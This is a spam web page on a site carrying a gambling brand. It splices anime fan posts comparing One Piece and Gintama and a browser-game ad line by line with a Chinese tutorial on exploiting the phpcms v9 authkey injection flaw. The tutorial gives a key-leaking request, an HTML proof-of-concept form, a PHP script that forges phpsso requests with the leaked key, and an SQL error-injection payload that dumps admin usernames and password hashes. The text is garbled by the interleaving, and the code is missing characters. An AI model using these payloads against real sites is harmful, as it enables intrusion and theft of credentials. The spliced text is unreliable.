动漫动画

当前位置:澳门金莎娱乐场网址 > 动漫动画 > 哪个好看,少有的经典之作

哪个好看,少有的经典之作

来源:http://www.lfxindai.com 作者:澳门金莎娱乐场网址 时间:2019-09-07 05:32

<op>是我看过的日本动漫中非常少的经典之作,从都到尾都好看,不像其他动漫,总有一部分是不好看的,缺乏激情的.比如<火影>,自从佐助走后就根本不好看了,感觉缺少主线,到了后来的<疾风传>才好看起来.
但<op>却不一样,它的主线都非常清楚,梦想,友情,这2个最大的卖点一直都没有中断过,让人看了非常的连贯.
草帽海贼团的每个成员加入的瞬间都历历在目,但最让我感动的是乔巴的加入,庸医为了鼓励乔巴和不打断它心中的梦想,居然喝下剧毒的蘑菇汤!这是多么伟大的壮举啊!
总之<op>每次让我看了都有热血沸腾的感觉,让我觉得自己还没有麻木,还可以做点什么,希望<op>可以带给更多人力量!

2013年乐都网强档新游-----《动漫英雄传》今日10:00点开启首次不删档内测!该游戏集齐了火影、死神、海贼三大超人气动漫英雄!这是近万动漫达人粉丝齐聚一堂的超级盛会!6月19日10:00点双线1服正式开启,不删档内测震撼启动!玩游戏乐都网还送你100%正版乔巴手办!动漫神作来临,引爆你的想象!!!《动漫英雄传》唯一官方网站:

问题:

简单的POC EXP 编写 (上)

图片 1

个人认为《银魂》比《海贼王》好看。

 

动漫最强大乱斗,今日火爆开测!真实游戏宣传视频: src="" allowFullScreen="true" quality="high" width="480" height="400" align="middle" allowScriptAccess="always" type="application/x-shockwave-flash"></embed>【乐都网《动漫英雄传》游戏介绍】《动漫英雄传》是一款由乐都网独家运营的动漫风格RPG网页游戏。游戏以时下最热门的动漫作品“火影忍者”、“海贼王”与“死神”的故事为蓝本,用纯正的3D日本漫画人物配合酷炫的战斗绝技特效营造了一个动漫英雄大乱斗的冒险世界。游戏中,玩家可以在近百名动漫英雄中选择自己最喜欢的伙伴,兼有策略游戏的布阵战役玩法、也有令人宅男心动的女仆屋玩法、还有全新特色卡牌援军技。那些熟悉的漫画人物、令人垂泪的经典一幕、热血沸腾的漫画记忆一定都将随之再次唤醒。

回答:其实看过这两部作品的人就会发现,海贼和银魂属于完全不同类型的动漫

作者BY Greekn  

图片 2

图片 3

 

燃烧吧动漫的青春梦想!

海贼是典型嘅热血少年漫画,如果动漫会出教科书的话,海贼绝对会是热血漫里面的典型

今天主要讲的 是关于web 方面的 poc 编写

图片 4

而银魂,虽然一开始好像也披着热血的外衣,但是认真看的话,会发现热血只是其中的元素,但不是故事的内核

 

《动漫英雄传》是一款动漫英雄大乱斗的网页游戏,玩家在这里能体验到火影,死神,海贼等原汁原味的经典动漫故事,游戏采用了过关推图的主线推进模式,玩家可以在游戏中招募伙伴,排布阵型,学习援军技能来进行战斗,除了基本的装备强化宝石镶嵌,玩家还可以通过打造宝物,开启星魂等提升战斗力。除此以外,游戏还设计有女仆玩法,玩家可以和女仆进行丰富的互动,获得资源。

之前在网上看过一句话形容这两部动漫,小白觉得特别贴切

关于web 安全 个人理解的话

图片 5

海贼是教会人们如何追求梦想,如何为了梦想而努力

 

图片 6

银魂是教会人们如何在梦想破碎之后坚强地面对生活

一个就是攻击  另一个就是漏洞挖掘了 防御的话 看自己的经验了

三大阵营角色选择

图片 7

 

图片 8

这两部片子一部代表梦想,一部代表生活,就如我们没办法定义出梦想和生活究竟哪个比较重要一样,对于海贼和银魂其实也很难定义两部究竟谁更好

攻击的话 不管自己黑的漫天飞也是利用别人的 工具  或者漏洞罢了

《动漫英雄传》初入新手村 《动漫英雄传》采用了自动回合的战斗模式,每个角色也有其看家的绝技,每次攻击以及“绝招”的释放都是让玩家大呼过瘾的一刻,在游戏中人物、角色、技能、装备、等级、属性、组合、站位、等等都将影响到战斗的胜负。

图片 9

 

图片 10

海贼大概是从06年就开始看,追到现在也已经十二年,是迄今为止追过最长时间的动漫,他对于小白的意义远远胜过动漫本身,可以说这部动漫陪伴了小白整个青春

这样 只会攻击的话我们是学不会指哪打哪的 所以我们就需要掌握 漏洞挖掘了

玩家熟悉的自动回合战斗伙伴系统 《动漫英雄传》中玩家可以招募自己喜欢的伙伴,每个角色也有其看家的绝技,也有自己的特性,奶妈,肉盾,打手,玩家根据角色的特性来选择。

图片 11

 

图片 12

银魂一开始也是慕名观看,看了三次都看不下,仅仅看了几集就放弃,后面想起又接着看,一直都没有看完,知道有一次实在无聊,就耐着性子看下去,但是越到后面就发现越来越喜欢这部片子,唯一一部看了很多遍的动漫

漏洞挖掘的流程 应该是这样的

玩家可以招募蓝色、紫色、金色伙伴

所以,对于这两部作品,小白觉得都很好看

 

图片 13

回答:个人偏爱海贼王!

通用应用程序(挖掘)> 发现漏洞(调试)>POC/EXP(编写)

招募后根据伙伴的特性安排阵型

图片 14

 

图片 15

要说《银魂》和《海贼王》相比哪个更加好看,其实这个问题是仁者见仁智者见智,每个人的喜好是不一样,所以两部作品说不上谁比谁更好,只能说哪一部作品的读者更多吧!
图片 16

所以 POC/EXP 也是 在漏洞挖掘后 的最后一个环节

《动漫英雄传》中的PK战斗画面:

本人追海贼王的时间不长,是在13年开始看的,和很多海米是比不了啊!我花了大概半年的时间看完了更新了十多年的动画版!之后就是每周日期待着新一集的更新!
图片 17

 

图片 18

我是发现朋友看海贼王这部动漫而且他们都一致好评,好奇心驱使着我观看,然后就深陷其中了!在东海娜美的故乡阿龙篇被娜美的遭遇经历感动伤心,阿拉巴斯坦篇章逻辑结构剧情紧密赞叹不已!
图片 19

自己挖到了 oday 零贝 可以写成 批量 工具 加大数据

死神阵营今日正式加入!

水之都司法岛、恐怖三位帆船、香波地群岛、顶上战争每个篇章都是充满着精彩与感动,我真的是太佩服作者了!
图片 20

 

图片 21

这些就是我喜爱他的原因。但是对于《银魂》这部作品,我并不了解,所以在这里也为不好妄加评论!但是这部作品的大名却是早有耳闻!读者的眼睛是雪亮的,我也相信《银魂》是一部非常棒的作品!
图片 22

这样 的话是不是专业一点呢

动漫原著经典剧情

最后对于两部作品谁更好我就不回答了,本人来说的话偏爱《海贼王》!

编写测试工具

图片 23

回答:用一张图来阐述一下海贼王与银魂区别!

 

女仆屋休闲玩法【6月19日内测五大福利活动介绍】福利一、玩游戏送正版乔巴手办:

图片 24

漏洞去年爆的phpcms  v9 authkey 注入漏洞

图片 25

《海贼王》《银魂》两部动漫都是集英社的王牌。一部正宗少年热血番,一部是混杂的日常搞笑番。

 

抱正版乔巴手办回家

图片 26

环境的话 我是百度下载的 phpcms v9 5.8 的网站源码

图片 27

图片 28

 

可爱乔巴手办可以变换3个造型福利二、官方新手礼包领取: x 3、痒痒卡 x 1、1级银币卡 x 5、大经验卡 x 1、一级福袋 x 2、二级福袋 x 1、三级福袋 x 1、炮弹 x 3、30级通用材料 x 10福利三、封测答谢福袋:

先说一下《海贼王》吧。记得以前我看的时候,名字还叫《航海王》后来改了。对看动漫的九零后来说,这部算是陪我们成长的动漫,在整个动漫界是泰山北斗级别的巨著,连载二十多年依旧经久不衰。

越高的版本 会修补这个漏洞的

图片 29

 

路飞,娜美,索隆,山治,乔巴,乌索普,罗宾,弗兰克,布鲁斯,以及新加入的甚平,草帽海贼船上的每个人,都会记忆犹新。

所以百度下载的

人物个性鲜明,是海贼王的一大卖点。路飞的白痴,索隆的路痴,山治花痴,娜美贪财,乌索普说谎,乔巴傲娇,罗宾腹黑,弗兰克变态……不说这些主角,甚至连出场只有一面的小角色,也能够塑造的极为鲜明。

 

再加上其热血丝丝入扣的情节,以及伙伴间羁绊情意,那些高潮情节往往能瞬间能戳中泪点。不得不说海贼王这是部很成功的动漫,堪称热血文教科书般的存在。

我们先来查看一下

现在依旧连载,但不得不吐槽一句,海贼剧情有点拖了!!!

 

图片 30

payload

而《银魂》,主线不明,无节操,剧情诡异,里面的角色没一个正常的。

 

男主是个死鱼眼,混吃等死的懒惰银色卷毛不良青年,女主是个萝莉身大叔心的暴力吃货,副男主是个全剧话最多其实还不如眼睛存在感高的吐槽货!

[AppleScript] 纯文本查看 复制代码

一开始我看的时候,说实话就是冲着人气忍着看,这都是讲的什么啊!

?

前面的剧情纯粹就是吐槽剧,不知道这部动漫到底要说什么,云里雾里的,除了黄就是污。但是如果你耐心看到后面,你会发现,这尼玛神作啊!当时简直如同嗑药一般,不停的追银魂,一天就能看出二十集!

1
api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=......phpsso_servercachescaches_admincaches_dataapplist&path=admin

银魂里面黄段子污点不断,什么前列腺刹车,阿姆斯特朗回旋加速式阿姆斯特朗炮!简直能让你看的脸红,没被禁简直是奇迹!

这个 payload 是爆 phpcms key的 ta可以帮我们来验证一下 phpcms 网站是否有这个漏洞

但成功动漫该有的,银魂都不缺,人物形象鲜明,不同别的动漫,其中人气火爆的配角有很多!冲田总悟,土方十四郎,神威,高杉晋助,桂小太郎……人气不亚于主角银时!

 

热血能热血到头皮发麻,感动能感动到你眼泪哗哗,搞笑的时候能笑的你肚子发胀!夹杂在这部动漫中的理念,堪称信仰,仔细回想剧情一看,这部污秽没节操的动漫里其实阐述的东西,都是满满的正能量元素。

我们先简单 的利用 html 写个 验证  脚本

这两部剧,每个人的喜好观点都不一样,谁优谁劣不好说。相对而言,我个人更喜欢银魂!

 

其实,浏览各大网站评论看看,就会发现,银魂的粉丝是最铁杆的,凝聚力很强,喜欢的是真的非常喜欢!

Html poc 验证代码

九月十五号,银魂就要完结,多希望空知猩猩再次骗人诈完结啊!

[AppleScript] 纯文本查看 复制代码

用一生节操,换银魂永不完结!

?

图片 31

1
2
3
<form action="http://127.0.0.1/2/api.php?op=get_menu&act=ajax_getlist&callback=aaaaa&parentid=0&key=authkey&cachefile=......phpsso_servercachescaches_admincaches_dataapplist&path=admin" method="post">
<input type="submit" value="爆菊花" />
</form>

这个payload 是GET 的方式 访问的 我们无需提交数据

<ignore_js_op>图片 32 

我们点击 submit表单

<ignore_js_op>图片 33

 

我们访问了这个网站 验证了这个网站是存在漏洞的

关于 html 编写poc 方式多种多样主要 看payload

 

我们根据payload 来编写 脚本 or 工具

 

不过 这样的话 还是非常麻烦的

 

我们还是 去写 一款 可视化的 利用工具吧

 

从 验证 漏洞  然后 到 利用漏洞

 

这样才能达到我们的目的对吧

 

补充一下

关于POC 与EXP 的概念

I春秋论坛找的

 

通常 EXP OR POC 都是可以执行的的漏洞利用脚本 或者程序

区别主要在于是否恶意

 

Poc 是proof  of  concept 的简称 翻译过来就是 (漏洞验证)

 

Exp 是 exploit  的简称 翻译过来就是 (漏洞利用)

 

搞清楚概念就行了

 

下面我们 写的是exp 利用工具

 

开发环境

 

编程语言 > 易语言

 

利用模块 > 精易模块

 

函数()的话 自己看代码了

 

我们写简单看一下注入的脚本

 

这段是php写的代码

 

[AppleScript] 纯文本查看 复制代码

?

001
002
003
004
005
006
007
008
009
010
011
012
013
014
015
016
017
018
019
020
021
022
023
024
025
026
027
028
029
030
031
032
033
034
035
036
037
038
039
040
041
042
043
044
045
046
047
048
049
050
051
052
053
054
055
056
057
058
059
060
061
062
063
064
065
066
067
068
069
070
071
072
073
074
075
076
077
078
079
080
081
082
083
084
085
086
087
088
089
090
091
092
093
094
095
096
097
098
099
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
<?php
#error_reporting(0);
 
$url = $_GET['url'];
$key = $_GET['key'];
//$host = '网站';
//$auth_key = 'key';
//$string = "action=member_delete&uids=".$_GET['id']; //uids注入点
 
 
$host = "http://$url/";
$auth_key = "$key";
$string = "action=member_delete&uids=".$_GET['id']; //uids注入点
$strings = "action=member_add&uid=88888&random=333333&username=test123456&password=e445061346e44cc38d9f985836b9eac6&email=ffff@qq.com®ip=8.8.8.8";
 
 
 
 
$ecode = sys_auth($strings,'ENCODE',$auth_key);
$url = $host."/api.php?op=phpsso&code=".$ecode;
$resp = file_get_contents($url);
#echo $resp;
$ecode = sys_auth($string,'ENCODE',$auth_key);
$url = $host."/api.php?op=phpsso&code=".$ecode;
#echo $url;
$resp = file_get_contents($url);
echo $resp;
 
 
 
$ecode = sys_auth2($strings,'ENCODE',$auth_key);
$url = $host."/api.php?op=phpsso&code=".$ecode;
$resp = file_get_contents($url);
#echo $resp;
$ecode = sys_auth2($string,'ENCODE',$auth_key);
$url = $host."/api.php?op=phpsso&code=".$ecode;
$resp = file_get_contents($url);
echo $resp;
 
 
$ecode = sys_auth3($strings,'ENCODE',$auth_key);
$url = $host."/api.php?op=phpsso&code=".$ecode;
$resp = file_get_contents($url);
#echo $resp;
$ecode = sys_auth3($string,'ENCODE',$auth_key);
$url = $host."/api.php?op=phpsso&code=".$ecode;
$resp = file_get_contents($url);
echo $resp;
 
 
 
function sys_auth($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
        $key_length = 4;
        $key = md5($key != '' ? $key : pc_base::load_config('system', 'auth_key'));
        $fixedkey = md5($key);
        $egiskeys = md5(substr($fixedkey, 16, 16));
        $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
        $keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
        $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string :
 
base64_decode(strtr(substr($string, $key_length), '-_', ' /'));
 
        if($operation=='ENCODE'){
                $string .= substr(md5(microtime(true)), -4);
        }
        if(function_exists('mcrypt_encrypt')==true){
                $result=sys_auth_ex($string, $operation, $fixedkey);
        }else{
                $i = 0; $result = '';
                $string_length = strlen($string);
                for ($i = 0; $i < $string_length; $i ){
                        $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
                }
        }
        if($operation=='DECODE'){
                $result = substr($result, 0,-4);
        }
         
        if($operation == 'ENCODE') {
                return $runtokey . rtrim(strtr(base64_encode($result), ' /', '-_'), '=');
        } else {
                if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result,
 
26).$egiskeys), 0, 16)) {
                        return substr($result, 26);
                } else {
                        return '';
                }
        }
}
 
function sys_auth_ex($string,$operation = 'ENCODE',$key)
{
    $encrypted_data="";
    $td = mcrypt_module_open('rijndael-256', '', 'ecb', '');
  
    $iv = mcrypt_create_iv(mcrypt_enc_get_iv_size($td), MCRYPT_RAND);
    $key = substr($key, 0, mcrypt_enc_get_key_size($td));
    mcrypt_generic_init($td, $key, $iv);
 
    if($operation=='ENCODE'){
        $encrypted_data = mcrypt_generic($td, $string);
    }else{
        $encrypted_data = rtrim(mdecrypt_generic($td, $string));
    }
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    return $encrypted_data;
}
 
 
 
function  sys_auth2($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
                $ckey_length = 4;
                $key = md5($key != '' ? $key : $this->ps_auth_key);
                $keya = md5(substr($key, 0, 16));
                $keyb = md5(substr($key, 16, 16));
                $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
 
                $cryptkey = $keya.md5($keya.$keyc);
                $key_length = strlen($cryptkey);
 
                $string = $operation == 'DECODE' ? base64_decode(strtr(substr($string, $ckey_length), '-_', ' /')) : sprintf('%010d', $expiry ? $expiry
 
time() : 0).substr(md5($string.$keyb), 0, 16).$string;
                $string_length = strlen($string);
 
                $result = '';
                $box = range(0, 255);
 
                $rndkey = array();
                for($i = 0; $i <= 255; $i ) {
                        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
                }
 
                for($j = $i = 0; $i < 256; $i ) {
                        $j = ($j $box[$i] $rndkey[$i]) % 256;
                        $tmp = $box[$i];
                        $box[$i] = $box[$j];
                        $box[$j] = $tmp;
                }
 
                for($a = $j = $i = 0; $i < $string_length; $i ) {
                        $a = ($a 1) % 256;
                        $j = ($j $box[$a]) % 256;
                        $tmp = $box[$a];
                        $box[$a] = $box[$j];
                        $box[$j] = $tmp;
                        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] $box[$j]) % 256]));
                }
 
                if($operation == 'DECODE') {
                        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result,
 
26).$keyb), 0, 16)) {
                                return substr($result, 26);
                        } else {
                                return '';
                        }
                } else {
                        return $keyc.rtrim(strtr(base64_encode($result), ' /', '-_'), '=');
                }
        }
 
 
         
function sys_auth3($string, $operation = 'ENCODE', $key = '', $expiry = 0) {
                $key_length = 4;
                $key = md5($key);
                $fixedkey = md5($key);
                $egiskeys = md5(substr($fixedkey, 16, 16));
                $runtokey = $key_length ? ($operation == 'ENCODE' ? substr(md5(microtime(true)), -$key_length) : substr($string, 0, $key_length)) : '';
                $keys = md5(substr($runtokey, 0, 16) . substr($fixedkey, 0, 16) . substr($runtokey, 16) . substr($fixedkey, 16));
                  
                $string = $operation == 'ENCODE' ? sprintf('%010d', $expiry ? $expiry time() : 0).substr(md5($string.$egiskeys), 0, 16) . $string :
 
base64_decode(substr($string, $key_length));
                //10位密文过期信息 16位明文和密钥生成的密文验证信息 明文
                  
                $i = 0; $result = '';
                $string_length = strlen($string);
                for ($i = 0; $i < $string_length; $i ){
                  $result .= chr(ord($string{$i}) ^ ord($keys{$i % 32}));
                }
                  
                if($operation == 'ENCODE') {
                    return $runtokey . str_replace('=', '', base64_encode($result));
                } else {
                        if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result,
 
26).$egiskeys), 0, 16)) {
                          return substr($result, 26);
                        } else {
                          return '';
                        }
                }
    }
 
 
?>

 

其中我们要填写二个参数 一个是获取的key 和目标站

 

把ta在写到 php 环境 下 执行

 

然后启用我们的注入payload 才行

 

我们看下payload

 

[AppleScript] 纯文本查看 复制代码

?

1
php?url=url&key=key&id=userid=1%20and%20(SELECT%201%20FROM(SELECT%20count(*),concat((SELECT(SELECT%20concat(0x7e,0x27,cast((substring((select concat(0x7e,0x27,username,0x3a, password, 0x3a, encrypt,0x27,0x40,0x7e) FROM `v9_admin` WHERE 1 limit 0,1),1,62))%20as%20char),0x27,0x7e))%20FROM%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20FROM%20information_schema.columns%20group%20by%20x)a)

 

这个直接在 那个注入脚本后面执行注入payload 才能爆出账户密码来

这个payload 需要填写二个参数和之前一样一个是key 和目标站

然后看一下我们 易语言写的EXP 利用工具怎么写吧

<ignore_js_op>图片 34 

我们写看一下软件的界面吧

 

我的想法是 首先写验证漏洞是不是存在

 

第二个自动会填写获取的key 和目标URL 到环境参数搭建这里

 

然后就是 自己填写一下 php环境的路径还有生成的文件名是php前面的自定义就可以了

 

然后开始获取数据这里 自己只要填写一下local 本地 地址就可以了就是那个 php环境下的那个生成的文件 填写文件名和后缀就可以

 

开始exploit 获取数据了

我们看一下流程

 

首先我们输入目标地址 点击验证漏洞

 

判断漏洞存在 程序会吧数据回显的key 自动输入到环境参数搭建这里

 

<ignore_js_op>图片 35

这样我们把替换的数据都写到了 php环境下了

程序也会自动 把环境参数搭建下的 key 和 URL 输入到开始获取数据这里

<ignore_js_op>图片 36

我们只要输入我们的那个生成的那个php的文件名和后缀和本地地址就可以注入出数据了

 

然后程序大概的流程是这样的 我会把源代码 打包好放在下面

 

如果感兴趣的可以看看

<ignore_js_op>图片 37

我这样就不在过多的去写了

 

其实也可以添加皮肤 等等 把工具做的好看一点对吧

 

其实还可以写的方便一点的就不在浪费时间了 主要的架构我觉得是这样的

 

以后还会出 下篇文章的

 

这篇文章比较简单

<ignore_js_op>图片 38

程序没有注释 所以大家可以自己看看 有兴趣的

 

下面是实战怎么找这个漏洞可以利用的目标

<ignore_js_op>图片 39

 

所以我不在实战了 实战也是一样的利用了

 

<ignore_js_op>图片 40

本文由澳门金莎娱乐场网址发布于动漫动画,转载请注明出处:哪个好看,少有的经典之作

关键词:

上一篇:有关梦想,连打败他的理由都没有

下一篇:没有了